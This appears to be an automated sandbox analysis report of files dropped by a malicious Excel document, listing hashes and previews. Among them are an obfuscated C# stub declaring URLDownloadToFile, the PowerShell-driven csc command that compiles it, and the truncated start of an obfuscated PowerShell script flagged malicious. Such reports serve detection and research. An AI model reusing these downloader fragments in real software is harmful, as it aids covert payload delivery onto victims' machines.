                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 4 09:56:02 2024, 1st section name ".debug$S"
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1328
                                                                                                                                            Entropy (8bit):3.9826261865546626
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:H1Qe9Eur9vv4dHvuQwKdNWI+ycuZhNSoakSl9PNnqSqd:3rlvwPu/Kd41ul5a3FqSK
                                                                                                                                            MD5:B440E6E56B55179FA2793571BF47BFB3
                                                                                                                                            SHA1:4976FF61FCDC005A26906E078868C241F079A4CD
                                                                                                                                            SHA-256:2DBA25B33B3A0B2C88CA88F6C13A5DE4DBC10B47F86122684CBF48E9B81E967E
                                                                                                                                            SHA-512:ED04BA224F282C05F6902FA0B6D0C0F54CDDFCA62B837D50AEDAEA9E779AB5273EFC592020916A2B858DBDBCE6C8676EDC18F6AE1AB0D6D56C0E9D9479C6BBF8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L......f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\00kppfao\CSC26532048CBB457996C7A8C029DD268B.TMP...................r..D.../.XG...........4.......C:\Users\user\AppData\Local\Temp\RESB349.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.0.k.p.p.f.a.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 4 09:56:20 2024, 1st section name ".debug$S"
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1328
                                                                                                                                            Entropy (8bit):4.0141329150545735
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:HQe9E2ULFDdHGwKdNWI+ycuZhNhqakSobPNnqSqd:IxRFKd41ulhqa3oRqSK
                                                                                                                                            MD5:1BD59A13F09C8EC5E55D118F897B4A03
                                                                                                                                            SHA1:14E3B961D8E830F42184E4696D9742AB62AD4E67
                                                                                                                                            SHA-256:B0B8B9D7C7A587D636A8FD5686A69CF257BAEE351CC9A3AB14BDA085D2865926
                                                                                                                                            SHA-512:5208A474DA97E522AD507548F8D2BF65F13EF28BE9218B6DC9327879EF3343C0B6B7FAA8863224B8D8BA118E6AAA206E2F783A43AEFE0B3AC33EE29376488FAC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L.....f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\qjwmez35\CSC8672896636494697B648CFD8C23C5D6C.TMP..................\.....O2.XqY..........4.......C:\Users\user\AppData\Local\Temp\RESFA28.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.j.w.m.e.z.3.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x04bd0707, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):21037056
                                                                                                                                            Entropy (8bit):1.1392807925804254
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:O91U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:O9EXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                            MD5:A6EAB331B96538EDCB2BB6E2D57258F0
                                                                                                                                            SHA1:5454501593AECAE6A163F01F52BB05E34F8B2084
                                                                                                                                            SHA-256:E8402785567EED1B99EAE6A3057D483FDD084C943A677958A63E9E241E539C45
                                                                                                                                            SHA-512:AADC00EF912F2103B28B6F3C4092255CF96823CAB5CD5AC1820C8E5D0378C739E12098677F3A16108F195DCE39053E0DC9F25D398ED684C565AF01D9EA1B7061
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....... ........................u..............................;:...{..37...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2
                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Qn:Qn
                                                                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                            File Type:MSVC .res
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):652
                                                                                                                                            Entropy (8bit):3.1305534997587556
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0Sqak7YnqqFSbPN5Dlq5J:+RI+ycuZhNhqakSobPNnqX
                                                                                                                                            MD5:FBFBCD5CF2C3C49280F04F32EA587159
                                                                                                                                            SHA1:2D212F0D9BBD866070BB8133E96C91A21A992E76
                                                                                                                                            SHA-256:D08E32AD7F99812B5ADCF0FDDD90C340F4B1A04E059E4F4C745620533F10C599
                                                                                                                                            SHA-512:EDC8811C6DE10A72F109CF89142C5F13BD3B100FD6324A5F7465D4BFF95E5D6850AFB103BF715578100268983A0EBBD085B4E5D92D7766F33F115018CB218D31
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.j.w.m.e.z.3.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.j.w.m.e.z.3.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (368)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):494
                                                                                                                                            Entropy (8bit):3.957311526298906
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:V/DsYLDS81zu9jtauVMOnQXReKJ8SRHy4H1pr9Qm+SFij/KHHQy:V/DTLDfui+QXfHfr2uWyQy
                                                                                                                                            MD5:E39F9C6D0BDBC159574188842BE55EAE
                                                                                                                                            SHA1:3BF4AAAC9AB701A13A4C109B951A5F2204718AAC
                                                                                                                                            SHA-256:13E12E3E05D1B0210A7FB99E152A4AA0F298F9B764B016669F7DBC2933F8DDDE
                                                                                                                                            SHA-512:FE73CD3B52090C31978F4EA643682FAE645E224C2C1839BEA513A6AB9C369D4CD4C39D9C12BC21D2B6BF5AF99D65E39BC8AB3D5F2297CF2B3ED3B094FC93074B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace OXMygYLEYqv.{. public class hmfXhOXgMWY. {. [DllImport("URLMoN.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr bzcwtLNw,string fwjV,string flWcDs,uint DxFWbnW,IntPtr tCjbMzExQB);.. }..}.
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):369
                                                                                                                                            Entropy (8bit):5.281065888755731
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fO6Jazxs7+AEszIP23fO6J/:p37Lvkmb6KzEWZEoB
                                                                                                                                            MD5:3CDB7A4D32997475C67C2954FA390246
                                                                                                                                            SHA1:06B4E916B360EB567688154C3555FD7F80C879C9
                                                                                                                                            SHA-256:33081477B1FEAF267F32A5D0D711A92BF3991C4FFEB94DFD3C0A7CE302B9F60C
                                                                                                                                            SHA-512:74861A8ABC820EC6451903825BE8E4599E9E724B61EC0572ECF85C785508F3CFF5628CE3F17E6DCF6ECF83CE58C5FFA9CD140C57AE4A3FC6F1BE4CD622FC729F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.0.cs"
                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3072
                                                                                                                                            Entropy (8bit):2.8902462635329313
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:etGSFEpuYYNdl8mJlykFL8GytkZfeXiLtFWI+ycuZhNhqakSobPNnq:6VY4+mJl98G1JeSLm1ulhqa3oRq
                                                                                                                                            MD5:B7963B7604E4ACC1FB60DF935EB6CAE5
                                                                                                                                            SHA1:EDB7B2B0B01CF3CE9DBD2AAFBF870BB4C5748112
                                                                                                                                            SHA-256:5D513CBC9E37CB012F60BEC97C8D4F54B78E9E30671444E5EB00FEF346DB6D0D
                                                                                                                                            SHA-512:D0E2C59AEDA88A236EE8B1C417B3BD72D2591502F4129A9D5E97B897B35D68AA8E7C7DD47531E5349A0CA7AA0A6C432BFAAE7D804E222471EFC2E844759DD32B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f...........!.................#... ...@....... ....................................@.................................l#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......,...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................?.8.......................................#.............. F.....P ......X.........^.....g.....l.....s.....{...X.....X...!.X.....X.......!.....*.......F......................................./..........<Module>.qj
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):866
                                                                                                                                            Entropy (8bit):5.369895632009529
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:AId3ka6KzlEokKaMD5DqBVKVrdFAMBJTH:Akka60lEokKdDcVKdBJj
                                                                                                                                            MD5:9E7C3804C4475FCB147DBFBA946AC2EA
                                                                                                                                            SHA1:8B42FA6F4FD9E7A1ADE09B18EE6771674AA6820D
                                                                                                                                            SHA-256:5D9BAAB7FFDF4723D406DB3EC40D76FBB00B2924104A42BB6693198375E38D50
                                                                                                                                            SHA-512:32AF19CF1133C27B12B266812F66FC694ADC1619E0FD0A618AC76584E904852B3C474C3B04D9A3961F9813E42C26CA70D21C8CF058659EA0E28CA425D6998901
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):512
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3::
                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):512
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3::
                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):512
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3::
                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):334132
                                                                                                                                            Entropy (8bit):3.7592756836457886
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:8gT5umy/FrPBBBU4W3hFUFYc1QvkhaUQCy37Gf2UjmkNcGV5jc2hUmwQ86Yk+GmF:8y5ErvBbW3hFUz1QK/Q537ehmkfV5jcB
                                                                                                                                            MD5:FE2617881E5B8181D922E6E19C80942D
                                                                                                                                            SHA1:3B29BE7A03B6CB86626888612BB9396C9ADD116B
                                                                                                                                            SHA-256:93B7AFFF3379C6A5421398F5EC92ABF1349B740F54FB5B610DA332C22110246A
                                                                                                                                            SHA-512:5C5799F996915DCC8D31C6120FE042B2FB8B7052F3E12904384EB51DADC483353EF84D2D8DF4C2E6BC06B1A1DA4C5B11EB718B16D31A965284531563F27A8040
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:..d.W.W.O.C.i.f.x.W.W.c.W.k.a.f.f.e.q.i.t.g.u.f.Z.W.R.G.e.a.G.p.O.L.L.i.l.G.R.C.d. .=. .".u.i.S.O.e.f.G.b.a.W.H.q.u.e.c.f.k.C.N.U.c.L.o.P.K.z.i.G.H.A.e.L.L.P.i.e.C.Z.H.i.v.".....f.c.s.j.L.a.A.i.o.L.o.K.z.G.h.K.W.L.G.c.L.m.c.f.f.f.N.G.L.p.I.R.Z.i.a.W.k.N.i.i. .=. .".i.m.p.i.L.W.W.x.H.G.N.c.R.K.L.C.h.c.G.r.L.K.u.G.a.U.G.B.K.r.k.U.G.n.k.e.W.N.e.G.".....W.u.n.L.H.x.U.f.c.W.v.p.W.G.m.h.d.W.h.b.L.W.o.Z.f.p.o.v.b.i.T.r.i.L.N.i.L.c.x.s. .=. .".f.u.o.W.Q.P.m.W.T.l.u.c.W.v.Z.G.c.h.i.k.P.C.K.q.K.S.c.W.z.U.K.e.W.x.z.U.L.L.W.t.".....B.c.d.Z.A.C.L.L.P.W.I.W.L.K.K.U.J.K.B.i.L.m.L.L.p.A.W.W.K.e.k.q.f.o.W.A.O.U.s.U. .=. .".b.o.f.L.T.I.e.N.i.W.L.h.k.t.h.e.L.U.W.k.P.l.n.k.j.B.p.q.L.A.J.W.O.U.C.q.N.b.z.P.".....b.U.N.C.L.v.B.G.h.h.K.f.e.d.W.e.G.r.i.W.W.o.x.P.U.J.u.R.P.G.i.e.W.b.d.N.z.W.L.N. .=. .".U.i.q.A.o.f.L.W.Z.e.k.c.z.h.r.P.C.W.f.f.P.u.L.r.L.h.L.L.u.z.k.k.p.o.R.A.z.U.O.L.".....Q.T.l.a.W.W.z.N.K.g.d.t.K.K.L.i.W.O.n.n.K.U.W.Z.a.U.R.H.T.B.k.s.L.W.N.U.m.i.L.W. .=. .".L.K.b.i.l.b.i.W.k.c.I.u.i.G.P.p.o.r.q.
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 4 10:56:11 2024, Security: 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1086464
                                                                                                                                            Entropy (8bit):7.284081399187737
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:DmzHJEHAfwu4hTD3DERnLRmF8DNNrf1X3dmau5dx8vHimlTv/RSLGL/krIK:SLw/hTbARM8jt3OEH9BSLGL/I
                                                                                                                                            MD5:8A75C017EA42102675CA8B9833B4DD66
                                                                                                                                            SHA1:522F239487BD6D6E33354EB35D4A268A0D331EDC
                                                                                                                                            SHA-256:E1F8CB824A295999760E0D6CD413EC44BD420B1A41516D108F6C2AE01716752B
                                                                                                                                            SHA-512:390069EDBA38D0FDF6CEB185E2F3C8A781883B040164A336D39F46820CAAA45C271EC3E174C7E23BC21D21329F1A1EBFFE0FBE52A857FA1475573062ADF17499
                                                                                                                                            Malicious:false
